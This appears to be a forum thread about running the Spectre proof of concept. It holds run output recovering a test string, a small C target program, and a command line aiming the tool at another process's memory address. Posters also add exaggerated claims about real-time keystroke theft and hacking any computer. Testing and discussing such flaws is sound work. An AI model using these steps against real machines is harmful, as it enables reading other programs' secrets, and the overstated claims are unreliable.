On Ubuntu 16.04.3 with Linux kernel 4.13.25

Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfed08... Success: 0x54='T' score=2
Reading at malicious_x = 0xffffffffffdfed09... Unclear: 0x68='h' score=999 (second best: 0x01 score=763)
Reading at malicious_x = 0xffffffffffdfed0a... Unclear: 0x65='e' score=999 (second best: 0x01 score=799)
Reading at malicious_x = 0xffffffffffdfed0b... Unclear: 0x20=' ' score=999 (second best: 0x01 score=660)
Reading at malicious_x = 0xffffffffffdfed0c... Unclear: 0x4D='M' score=999 (second best: 0x01 score=779)
Reading at malicious_x = 0xffffffffffdfed0d... Unclear: 0x61='a' score=999 (second best: 0x01 score=790)
Reading at malicious_x = 0xffffffffffdfed0e... Unclear: 0x67='g' score=999 (second best: 0x01 score=765)
Reading at malicious_x = 0xffffffffffdfed0f... Unclear: 0x69='i' score=999 (second best: 0x01 score=796)
Reading at malicious_x = 0xffffffffffdfed10... Unclear: 0x63='c' score=999 (second best: 0x01 score=799)
Reading at malicious_x = 0xffffffffffdfed11... Unclear: 0x20=' ' score=999 (second best: 0x01 score=772)
Reading at malicious_x = 0xffffffffffdfed12... Unclear: 0x57='W' score=999 (second best: 0x01 score=782)
Reading at malicious_x = 0xffffffffffdfed13... Unclear: 0x6F='o' score=999 (second best: 0x01 score=836)
Reading at malicious_x = 0xffffffffffdfed14... Unclear: 0x72='r' score=999 (second best: 0x01 score=782)
Reading at malicious_x = 0xffffffffffdfed15... Unclear: 0x64='d' score=999 (second best: 0x01 score=826)
Reading at malicious_x = 0xffffffffffdfed16... Unclear: 0x73='s' score=999 (second best: 0x01 score=759)
Reading at malicious_x = 0xffffffffffdfed17... Unclear: 0x20=' ' score=999 (second best: 0x01 score=799)
Reading at malicious_x = 0xffffffffffdfed18... Unclear: 0x61='a' score=999 (second best: 0x01 score=796)
Reading at malicious_x = 0xffffffffffdfed19... Unclear: 0x72='r' score=999 (second best: 0x01 score=804)
Reading at malicious_x = 0xffffffffffdfed1a... Unclear: 0x65='e' score=999 (second best: 0x01 score=812)
Reading at malicious_x = 0xffffffffffdfed1b... Unclear: 0x20=' ' score=999 (second best: 0x01 score=812)
Reading at malicious_x = 0xffffffffffdfed1c... Unclear: 0x53='S' score=999 (second best: 0x01 score=806)
Reading at malicious_x = 0xffffffffffdfed1d... Unclear: 0x71='q' score=999 (second best: 0x01 score=784)
Reading at malicious_x = 0xffffffffffdfed1e... Unclear: 0x75='u' score=999 (second best: 0x01 score=782)
Reading at malicious_x = 0xffffffffffdfed1f... Unclear: 0x65='e' score=999 (second best: 0x01 score=781)
Reading at malicious_x = 0xffffffffffdfed20... Unclear: 0x61='a' score=999 (second best: 0x01 score=770)
Reading at malicious_x = 0xffffffffffdfed21... Unclear: 0x6D='m' score=999 (second best: 0x01 score=781)
Reading at malicious_x = 0xffffffffffdfed22... Unclear: 0x69='i' score=999 (second best: 0x01 score=809)
Reading at malicious_x = 0xffffffffffdfed23... Unclear: 0x73='s' score=999 (second best: 0x01 score=788)
Reading at malicious_x = 0xffffffffffdfed24... Unclear: 0x68='h' score=999 (second best: 0x01 score=780)
Reading at malicious_x = 0xffffffffffdfed25... Unclear: 0x20=' ' score=999 (second best: 0x01 score=775)
Reading at malicious_x = 0xffffffffffdfed26... Unclear: 0x4F='O' score=999 (second best: 0x01 score=775)
Reading at malicious_x = 0xffffffffffdfed27... Unclear: 0x73='s' score=999 (second best: 0x01 score=788)
Reading at malicious_x = 0xffffffffffdfed28... Unclear: 0x73='s' score=999 (second best: 0x01 score=801)
Reading at malicious_x = 0xffffffffffdfed29... Unclear: 0x69='i' score=999 (second best: 0x01 score=828)
Reading at malicious_x = 0xffffffffffdfed2a... Unclear: 0x66='f' score=999 (second best: 0x01 score=782)
Reading at malicious_x = 0xffffffffffdfed2b... Unclear: 0x72='r' score=999 (second best: 0x01 score=800)
Reading at malicious_x = 0xffffffffffdfed2c... Unclear: 0x61='a' score=999 (second best: 0x01 score=791)
Reading at malicious_x = 0xffffffffffdfed2d... Unclear: 0x67='g' score=999 (second best: 0x01 score=802)
Reading at malicious_x = 0xffffffffffdfed2e... Unclear: 0x65='e' score=999 (second best: 0x01 score=810)
Reading at malicious_x = 0xffffffffffdfed2f... Unclear: 0x2E='.' score=999 (second best: 0x01 score=765)
Original: The Magic Words are Squeamish Ossifrage.
Recovered: The Magic Words are Squeamish Ossifrage.

The output code could be refined to mark an Unclear result as ?
If I get this right, the deciphered text will be T?????????????????
The Linux patch is working, but Windows didn't get it right.
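The refinement suggested in the post above, as an added example that is not part of the original post or of the posted tool: a parser for the output format shown, which keeps a byte only when the line says Success and reports the runner-up noise for Unclear reads. The function names are hypothetical; the sample lines are the first four reads from the post.

```python
import re
from collections import Counter

# First four reads, copied from the output posted above.
SAMPLE = """\
Reading at malicious_x = 0xffffffffffdfed08... Success: 0x54='T' score=2
Reading at malicious_x = 0xffffffffffdfed09... Unclear: 0x68='h' score=999 (second best: 0x01 score=763)
Reading at malicious_x = 0xffffffffffdfed0a... Unclear: 0x65='e' score=999 (second best: 0x01 score=799)
Reading at malicious_x = 0xffffffffffdfed0b... Unclear: 0x20=' ' score=999 (second best: 0x01 score=660)
"""

READ_RE = re.compile(
    r"Reading at malicious_x = (0x[0-9a-fA-F]+)\.\.\. (Success|Unclear): "
    r"0x([0-9A-Fa-f]{2})='.' score=(\d+)"
    r"(?: \(second best: 0x([0-9A-Fa-f]{2}) score=(\d+)\))?"
)

def parse_reads(text):
    """Return one dict per read; runner-up fields are None when none was printed."""
    reads = []
    for m in READ_RE.finditer(text):
        addr, status, byte, score, second, second_score = m.groups()
        reads.append({
            "addr": int(addr, 16),
            "status": status,
            "byte": int(byte, 16),
            "score": int(score),
            "second": int(second, 16) if second else None,
            "second_score": int(second_score) if second_score else None,
        })
    return reads

def strict_recovered(text):
    """Keep a byte only when the tool itself reported Success; otherwise '?'."""
    return "".join(chr(r["byte"]) if r["status"] == "Success" else "?"
                   for r in parse_reads(text))

def noise_summary(text):
    """Summarise Unclear reads that printed a runner-up: count, byte, score range."""
    unclear = [r for r in parse_reads(text)
               if r["status"] == "Unclear" and r["second"] is not None]
    if not unclear:
        return {"unclear": 0, "runner_up": None, "score_range": None}
    runner_up = Counter(r["second"] for r in unclear).most_common(1)[0][0]
    scores = [r["second_score"] for r in unclear]
    return {"unclear": len(unclear), "runner_up": runner_up,
            "score_range": (min(scores), max(scores))}
```
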
Depends. This is a very complicated mess. This is a case-by-case diagnostic. You can fool Spectre on some computer hardware. On AMD you can disable the eBPF JIT in order to prevent attacks on the kernel address space. But Spectre can be inter-application (not necessarily targeting the kernel directly). Spectre attacks address the core flaw in processor design. You can read from other applications, not only from your own memory.

For example, create a simple program (from github)

Code:
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int main(int argc, const char **argv)
{
    uint8_t *ptr;

    ptr = malloc(2 * sizeof(uint8_t)); // allocate room for both bytes written below
    if (ptr == NULL)
        return 1;
    ptr[0] = 65; // 'A'
    ptr[1] = 66; // 'B'
    printf("%d %d - %p\n", ptr[0], ptr[1], (void *)ptr); // print bytes and pointer
    getchar(); // wait for console input
    free(ptr);
    return 0;
}

Run the test program
./test
65 66 - 0x1a7c010

Run spectre with args in another console.
# ./spectre 0x1a7c010 2

In this way it can read in real time any character entered on the keyboard. Programmers can make portable applications for hacking every piece of computer, because the flaw in processor design allows this..... And the size of these malicious applications is not more than 20kb. Like a virus...

I'm not particularly good at predictions. But I cannot really see anything good happening from this flaw.
I saw Intel® Pentium® Processor 75 MHz, 50 MHz FSB. But the release note inside the archive microcode-20180108.tgz says: no Sandy Bridge and earlier.
I've posted updated code. Compile it however you want. I can't find a consistent way to get it working on all hardware. You might find that the "faster" version gives a better result on older hardware. I can only guess that the compiler is to blame as the version using a little assembly works perfectly on Linux.
CVE-2017-5753 (bounds check bypass)
CVE-2017-5715 (branch target injection)

Both get patched, but software also needs to be updated to mitigate Spectre.
Hmm, after reading all pages of this thread I can conclude that nowadays these are the only infallible/reliable/secure devices, I think.
The first edition you did was working perfectly.

New faster
Recovered: ?h? Magi? ??rd? ar? S?ue?m?sh ??s??r??e?

New slower
Recovered: ????????????????????????????????????????

MacOS